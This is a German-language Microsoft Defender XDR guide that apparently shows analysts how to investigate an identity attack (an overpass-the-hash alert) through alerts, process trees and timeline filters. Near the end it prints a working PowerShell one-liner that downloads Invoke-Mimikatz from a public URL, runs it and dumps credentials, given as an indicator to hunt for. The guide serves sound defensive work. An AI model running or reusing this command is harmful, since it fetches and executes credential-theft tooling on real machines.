Freigeben über


Beispiel für einen identitätsbasierten Angriff

Gilt für:

  • Microsoft Defender XDR

Microsoft Defender for Identity können ihnen dabei helfen, böswillige Versuche zu erkennen, Identitäten in Ihrem organization zu kompromittieren. Da Defender for Identity in Microsoft Defender XDR integriert ist, können Sicherheitsanalysten Einblick in Bedrohungen erhalten, die von Defender for Identity einher gehen, z. B. mutmaßliche Versuche zur Erhöhung von Netlogon-Berechtigungen.

Analysieren des Angriffs in Microsoft Defender for Identity

Microsoft Defender XDR ermöglicht Analysten das Filtern von Warnungen nach Erkennungsquelle auf der Registerkarte Warnungen auf der Seite "Incidents". Im folgenden Beispiel wird die Erkennungsquelle nach Defender for Identity gefiltert.

Filtern der Erkennungsquelle in Microsoft Defender for Identity

Wenn Sie die Warnung Suspected overpass-the-hash attack (Suspected overpass-the-hash attack) auswählen, wird eine Seite in Microsoft Defender for Cloud Apps angezeigt, auf der ausführlichere Informationen angezeigt werden. Sie können immer mehr über eine Warnung oder einen Angriff erfahren, indem Sie Weitere Informationen zu diesem Warnungstyp auswählen, um eine Beschreibung der Angriffs - und Wiederherstellungsvorschläge zu lesen.

Eine mutmaßliche Warnung für einen Overpass-the-Hash-Angriff

Untersuchen desselben Angriffs in Microsoft Defender for Endpoint

Alternativ kann ein Analyst Defender für Endpunkt verwenden, um mehr über die Aktivität auf einem Endpunkt zu erfahren. Wählen Sie den Incident aus der Incidentwarteschlange und dann die Registerkarte Warnungen aus. Von hier aus können sie auch die Erkennungsquelle identifizieren. Eine Erkennungsquelle mit der Bezeichnung EDR steht für Endpunkterkennung und -antwort, d. h. Defender für Endpunkt. Hier wählt der Analyst eine warnung aus, die von EDR erkannt wurde.

Endpunkterkennung und -antwort im Microsoft Defender for Endpoint-Portal

Auf der Warnungsseite werden verschiedene relevante Informationen angezeigt, z. B. der name des betroffenen Geräts, der Benutzername, status der automatischen Untersuchung und die Warnungsdetails. Der Warnungsverlauf stellt eine visuelle Darstellung der Prozessstruktur dar. Die Prozessstruktur ist eine hierarchische Darstellung der übergeordneten und untergeordneten Prozesse im Zusammenhang mit der Warnung.

Eine Warnungsprozessstruktur im Microsoft Defender for Endpoint

Jeder Prozess kann erweitert werden, um weitere Details anzuzeigen. Details, die ein Analyst sehen kann, sind die tatsächlichen Befehle, die als Teil eines schädlichen Skripts eingegeben wurden, IP-Adressen für ausgehende Verbindungen und andere nützliche Informationen.

Die Prozessdetails im Microsoft Defender for Endpoint-Portal

Wenn Sie In Zeitleiste anzeigen auswählen, kann ein Analyst einen Drilldown durchführen, um den genauen Zeitpunkt der Kompromittierung zu bestimmen.

Microsoft Defender for Endpoint können viele schädliche Dateien und Skripts erkennen. Aufgrund vieler legitimer Verwendungsmöglichkeiten für ausgehende Verbindungen, PowerShell und Befehlszeilenaktivitäten werden einige Aktivitäten jedoch als harmlos angesehen, bis eine schädliche Datei oder Aktivität erstellt wird. Daher hilft die Verwendung der Zeitleiste Analysten dabei, die Warnung mit der umgebenden Aktivität in Einen Kontext zu setzen, um die ursprüngliche Quelle oder Uhrzeit des Angriffs zu bestimmen, die andernfalls durch allgemeine Dateisystem- und Benutzeraktivitäten verdeckt wird.

Um die Zeitleiste zu verwenden, würde ein Analyst zum Zeitpunkt der Warnungserkennung (rot) beginnen und rechtzeitig rückwärts scrollen, um zu bestimmen, wann die ursprüngliche Aktivität, die zu der schädlichen Aktivität geführt hat, tatsächlich gestartet wurde.

Startzeit des Analysten für die Warnungserkennung

Es ist wichtig, allgemeine Aktivitäten wie Windows Update-Verbindungen, Windows Trusted Software-Aktivierungsdatenverkehr, andere gängige Verbindungen mit Microsoft-Websites, Internetaktivitäten von Drittanbietern, Microsoft Endpoint Configuration Manager-Aktivitäten und andere harmlose Aktivitäten von verdächtigen Aktivitäten zu verstehen und zu unterscheiden. Eine Möglichkeit zur Unterscheidung besteht darin, Zeitleiste Filter zu verwenden. Es gibt viele Filter, die bestimmte Aktivitäten hervorheben können, während alles herausfiltert, was der Analyst nicht anzeigen möchte.

In der folgenden Abbildung hat der Analyst gefiltert, um nur Netzwerk- und Prozessereignisse anzuzeigen. Dieses Filterkriterium ermöglicht es dem Analysten, die Netzwerkverbindungen und Prozesse um das Ereignis zu sehen, bei dem Notepad eine Verbindung mit einer IP-Adresse hergestellt hat, die wir auch in der Prozessstruktur gesehen haben.

Verwendung von Editor zum Herstellen einer schädlichen ausgehenden Verbindung

In diesem speziellen Ereignis wurde Editor verwendet, um eine böswillige ausgehende Verbindung herzustellen. Angreifer verwenden jedoch häufig iexplorer.exe, um Verbindungen zum Herunterladen einer schädlichen Nutzlast herzustellen, da normalerweise iexplorer.exe Prozesse als normale Webbrowseraktivitäten betrachtet werden.

Ein weiteres Element, nach dem im Zeitleiste gesucht werden sollte, ist PowerShell für ausgehende Verbindungen. Der Analyst würde nach erfolgreichen PowerShell-Verbindungen mit Befehlen suchen, z IEX (New-Object Net.Webclient) . B. gefolgt von einer ausgehenden Verbindung mit einer Website, die eine schädliche Datei hostet.

Im folgenden Beispiel wurde PowerShell verwendet, um Mimikatz von einer Website herunterzuladen und auszuführen:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Ein Analyst kann schnell nach Schlüsselwörtern suchen, indem er in die Schlüsselwort (keyword) in die Suchleiste eingibt, um nur ereignisse anzuzeigen, die mit PowerShell erstellt wurden.

Nächster Schritt

Weitere Informationen finden Sie unter Phishing-Untersuchungspfad .

Siehe auch

Tipp

Möchten Sie mehr erfahren? Engage mit der Microsoft-Sicherheitscommunity in unserer Tech Community: Microsoft Defender XDR Tech Community.